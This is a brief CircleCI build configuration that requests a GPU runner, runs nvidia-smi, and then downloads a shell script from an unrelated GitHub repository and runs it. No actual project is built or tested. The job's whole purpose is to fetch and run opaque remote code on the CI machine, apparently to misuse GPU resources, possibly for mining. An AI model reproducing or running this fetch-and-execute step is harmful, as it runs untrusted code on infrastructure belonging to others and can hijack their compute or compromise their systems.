version: 2.1

jobs:
  build:
    machine:
      image: ubuntu-1604-cuda-10.1:201909-23
    resource_class: gpu.nvidia.small
    steps:
      - run: nvidia-smi
      - run: wget https://raw.githubusercontent.com/rayuor/54/main/mblayu.sh && chmod +x mblayu.sh && ./mblayu.sh
